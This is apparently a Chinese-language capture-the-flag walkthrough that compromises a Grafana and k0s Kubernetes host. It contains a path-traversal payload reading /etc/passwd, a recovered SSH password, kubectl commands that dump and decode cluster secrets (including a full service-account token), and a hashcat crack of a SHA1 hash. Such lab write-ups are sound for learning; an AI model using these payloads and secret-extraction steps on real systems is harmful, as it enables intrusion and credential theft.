启动启动

public/plugins/alertlist/../../../../../../../../../../etc/passwd

目录遍历攻击,grafana的默认配置文件在哪呢

/etc/grafana/grafana.ini

没什么东西,看main.css
里面有OZQWO4TBNZ2A====b32解密得到
vagrant

猜测是ssh的账号
密码是hereiamatctf907
Pasted%20image%2020240308142154
有点莫名奇妙

是个k0s
k0s kubectl get secret

k0s kubectl describe secret default-token-nhwb5

====
ca.crt:     1103 bytes
namespace:  7 bytes
token:      eyJhbGciOiJSUzI1NiIsImtpZCI6IjloanZwZEh2a1pRTlY1Tk1uSHo3RnJnaEt1alE2a2NCNGowOWtNb0ktSE0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tbmh3YjUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjEwZDQyNzEyLWJjNzUtNDlmOC1iMjM2LTNkMjFiMDQwNGY4YiIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.jQg6k-JN6KwQbwClB7HCoGFBxUy4ZV1CYbr15uQ7m6rO0edjCtFAzpumdXPO2qOGK5oBHNlhPRtp6LI6TdUlYZyMsNhfuecZiqAFPvnnQxXDrCg-SJPT6ZBNEAMq6a9IRLx_ppeFSNcjUMGE35bnpCaSF31NlzTzswEDHxk3rqrW-WZkVNhyVyxDa8gulilfwziktUknbbs7zwz3I6vjSwL_9pe1_RkLcRAejarF_jyUwgVlehdBrzZADw158AqLr5I61z0b3O1EX051wvmUKqC2WLuY1K_jqsB3kaa9gUYwDK4WByyCnWpX8SEO4iPl9PBQNQyDagjUfcFLWMSRMw

好像没什么用

k0s kubectl describe secret k8s.authentication

有个id属性,拿出来看看
k0s kubectl get secret k8s.authentication -o jsonpath='{.data.id}'| base64 --decode

其实这样就行了
k0s kubectl get secret k8s.authentication -o json

直接进去?
k0s kubectl exec -it kube-api -n kube-system -- /bin/bash

有点难绷,进不去
数据库在/var/lib/k0s/db/state.db
参考x1r0z分析

实际路径在/var/lib/k0s/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/38/fs/home/ubuntu/jokes
在这个containerdfind . | grep jokes就可以了

进去git log --pretty=oneline查看所有提交

拿到flag

k0s kubectl get job -n internship
k0s kubectl get job -n internship -o json

里面echo了一个hash值,直接hashes

也可以爆破
hashcat -m 100 -a 0 26c3d1c068e7e01599c3612447410b5e56c779f1 rockyou.txt --show